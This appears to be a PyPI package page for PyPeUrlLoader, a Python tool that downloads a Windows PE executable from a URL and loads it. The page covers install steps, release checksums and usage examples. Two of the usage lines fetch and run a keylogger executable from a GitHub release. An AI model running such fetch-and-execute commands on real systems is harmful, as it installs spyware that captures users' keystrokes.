PyPeUrlLoader
Description
This package uses PyPeLoader to load a PE program from a HTTP server (from an URL).
Requirements
This package require:
- python3
- python3 Standard Library
Installation
Pip
python3 -m pip install PyPeUrlLoader
Git
git clone "https://github.com/mauricelambert/PyPeUrlLoader.git"
cd "PyPeUrlLoader"
python3 -m pip install .
Wget
wget https://github.com/mauricelambert/PyPeUrlLoader/archive/refs/heads/main.zip
unzip main.zip
cd PyPeUrlLoader-main
python3 -m pip install .
cURL
curl -O https://github.com/mauricelambert/PyPeUrlLoader/archive/refs/heads/main.zip
unzip main.zip
cd PyPeUrlLoader-main
python3 -m pip install .
Usages
Command line
PyPeUrlLoader # Using CLI package executable
python3 -m PyPeUrlLoader # Using python module
python3 PyPeUrlLoader.pyz # Using python executable
PyPeUrlLoader.exe # Using python Windows executable
PyPeUrlLoader https://github.com/mauricelambert/NimKeylogger/releases/download/v0.0.1/Keylogger.exe keylogger
PyPeUrlLoader https://github.com/mauricelambert/NimKeylogger/releases/download/v0.0.1/Keylogger.exe keylogger C:\Windows\Temp\keylogger.exe
Links
License
Licensed under the GPL, version 3.
Release files for PyPeUrlLoader 1.0.0
For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.
Source distribution (sdist)
| File | Size | Uploaded | |
|---|---|---|---|
| pypeurlloader-1.0.0.tar.gz | 16.9 kB | Details |
Release files / pypeurlloader-1.0.0.tar.gz
| Download URL | pypeurlloader-1.0.0.tar.gz |
|---|---|
| Size | 16.9 kB |
| Tags | Source |
|
SHA-256 checksum How to use checksums |
8dffcabb1c1448a7261f4afc0ac52db945c4ba3bbcc89846d2304a6f16a41a57
|
|
BLAKE2b-256 checksum How to use checksums |
432e7ee890e4c8683dac014bafdfe2d574681c1b0ace144753bdd025a278a898
|
| Upload date | |
|
Uploaded using Trusted Publishing? What is trusted publishing? |
No |
| Uploaded via |
twine/6.1.0 CPython/3.13.2
|